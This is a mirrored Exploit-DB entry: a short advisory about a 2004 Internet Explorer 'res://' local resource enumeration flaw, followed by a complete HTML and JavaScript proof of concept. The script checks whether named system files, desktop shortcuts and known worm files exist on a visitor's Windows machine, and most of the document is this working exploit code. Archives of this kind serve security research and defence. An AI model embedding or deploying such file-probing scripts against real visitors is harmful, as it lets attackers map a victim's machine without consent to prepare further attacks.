bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/24727.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

65 lines
No EOL
2.2 KiB
Text
Raw Blame History

source: https://www.securityfocus.com/bid/11621/info
Microsoft Internet Explorer is reported prone to a local resource enumeration vulnerability. It is reported that the vulnerability exists because when handling 'res://' requests for local resources, Internet explorer behavior may reveal the existence of local files.
An attacker may employ information that is harvested in this manner to aid in further attacks that are launched against a target computer.
<textarea id="btft" rows="10" cols="75">&lt;/textarea&gt;<br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="> Search >"
onClick="alert('File '+btfc(document.all.btfn.value));">
<script>
// Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer
function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search");}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!\n";
else return "'"+btfp+"' does NOT exist!\n";}
var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...\n";
btfd+=btfc("autoexec.bat");
btfd+=btfc("msdos.sys");
btfd+=btfc("twain.dll");
btfd+=btfc("swflash.ocx");
btfd+=btfc("shell32.dll");
btfd+=btfc("test.txt");
btfd+=btfc("test.btf");
btfd+="\nSearch for shortcut files (on desktop) ...\n";
btfd+=btfc("Microsoft Word.lnk");
btfd+=btfc("IrfanView.lnk");
btfd+=btfc("Opera.lnk");
btfd+=btfc("Mozilla.lnk");
btfd+=btfc("Netscape 6.lnk");
btfd+=btfc("Netscape 7.lnk");
btfd+=btfc("btf.lnk");
btfd+="\nSearch for virus/worm files ...\n";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");
btfd+=btfv+"Klez' : "+btfc("wqk.exe");
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");
btfd+=btfv+"Maldal' : "+btfc("win.exe");
btfd+=btfv+"Gokar' : "+btfc("karen.exe");
// ...
document.all.btft.value=
"Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)\n\n"+
btfd;
</script>
Reference in a new issue View git blame Copy permalink